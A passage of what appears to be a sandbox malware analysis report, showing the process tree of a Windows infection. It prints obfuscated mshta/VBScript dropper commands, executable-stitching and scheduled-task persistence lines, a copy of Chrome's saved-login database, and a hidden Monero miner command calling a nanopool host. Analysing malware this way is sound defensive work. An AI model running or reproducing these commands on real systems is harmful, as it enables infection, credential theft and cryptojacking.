C:\Windows\SysWOW64\taskkill.exetaskkill /im "5667762.exe" /f10⤵
- Kills process with taskkill
PID:6364
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5952231.exe"C:\Users\Admin\AppData\Roaming\5952231.exe"7⤵
- Executes dropped EXE
PID:2452
-
-
C:\Users\Admin\AppData\Roaming\5824839.exe"C:\Users\Admin\AppData\Roaming\5824839.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5008 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
PID:4696
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe5⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1652 -
C:\Windows\system32\mspaint.exeC:\Windows\system32\mspaint.exe7⤵PID:4424
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1652 -s 4927⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe5⤵PID:1320
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe6⤵
- Executes dropped EXE
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exe7⤵
- Executes dropped EXE
PID:1164
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe5⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon178d8e5d06822.exeMon178d8e5d06822.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Users\Admin\AppData\Roaming\110301.exe"C:\Users\Admin\AppData\Roaming\110301.exe"9⤵
- Executes dropped EXE
PID:5128
-
-
C:\Users\Admin\AppData\Roaming\3258372.exe"C:\Users\Admin\AppData\Roaming\3258372.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5636
-
-
C:\Users\Admin\AppData\Roaming\8308170.exe"C:\Users\Admin\AppData\Roaming\8308170.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6024
-
-
C:\Users\Admin\AppData\Roaming\5935917.exe"C:\Users\Admin\AppData\Roaming\5935917.exe"9⤵PID:5796
-
-
C:\Users\Admin\AppData\Roaming\671081.exe"C:\Users\Admin\AppData\Roaming\671081.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4120
-
-
C:\Users\Admin\AppData\Roaming\200556.exe"C:\Users\Admin\AppData\Roaming\200556.exe"9⤵PID:4840
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\200556.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\200556.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )10⤵PID:7016
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\200556.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\200556.exe") do taskkill /im "%~nxT" /f11⤵PID:4340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "200556.exe" /f12⤵
- Kills process with taskkill
PID:4388
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
- Executes dropped EXE
PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵PID:5624
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
PID:4704
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
PID:2392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 7929⤵
- Program crash
PID:4872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 8089⤵
- Program crash
PID:3896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 7929⤵
- Program crash
PID:7028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 8049⤵
- Program crash
PID:4484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 9289⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5540
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
- Executes dropped EXE
PID:3080 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:4564
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵PID:6260
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵PID:6920
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:5016
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:4588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:7228
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:8052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:4484
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
PID:2200
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
PID:5600
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"8⤵PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵PID:4844
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:4724
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1560 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵PID:6420
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:3816
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
PID:5592
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:7836
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:5368
-
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵PID:7164
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
PID:9076 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵PID:8632
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵PID:8440
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵PID:4804
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe5⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe5⤵PID:1076
-
-
-
-
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- System policy modification
PID:6072 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"3⤵PID:4948
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵PID:7388
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:5656
-
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"2⤵PID:5896
-
-
C:\Program Files (x86)\X_r3\ms9r_l_r.exe"C:\Program Files (x86)\X_r3\ms9r_l_r.exe"2⤵PID:7596
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2520
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1328
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1148
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1092
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:892 -
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵PID:7288
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7604
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6660
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll",IuWtIecd2⤵
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7072
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5400
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7604
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7208
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8444
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8396
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:9028
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:8520
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:3504
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:7100
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵PID:8188
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:7664
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:6412
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll",IuWtIecd2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2300
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exe" -u1⤵
- Executes dropped EXE
PID:2924
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))1⤵PID:1692
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f2⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt3⤵PID:4112
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))4⤵PID:4364
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f5⤵PID:4756
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )4⤵PID:3000
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN5⤵PID:4580
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "6⤵PID:6736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"6⤵PID:6892
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /S YLIH.bIN6⤵
- Loads dropped DLL
PID:5052
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-FOEBL.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-FOEBL.tmp\Mon17bbf11fdb575d.tmp" /SL5="$201F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe" /SILENT1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\is-GCHC3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-GCHC3.tmp\postback.exe" ss12⤵
- Executes dropped EXE
PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe" /SILENT1⤵
- Executes dropped EXE
PID:3340
-
C:\Users\Admin\AppData\Local\Temp\is-R74LV.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-R74LV.tmp\Mon17bbf11fdb575d.tmp" /SL5="$C003A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1060
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe1⤵PID:1908
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6644 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7048
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8060 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:8092
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Modifies data under HKEY_USERS
PID:6476
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4436
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8008
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6904
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5524 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7FA35D192230D29377C29CDBACC7765C C2⤵PID:8468
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AAEACF3D768C17F520F52CCF62B7C6F62⤵
- Blocklisted process makes network request
PID:8020 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:7264
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D76F3200D734577D59F6D8DE32425393 E Global\MSI00002⤵PID:7984
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8240 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Modifies registry class
PID:8128
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1200 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7344
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6308 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3140
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Modifies system certificate store
PID:6368 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6756
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:6644
-
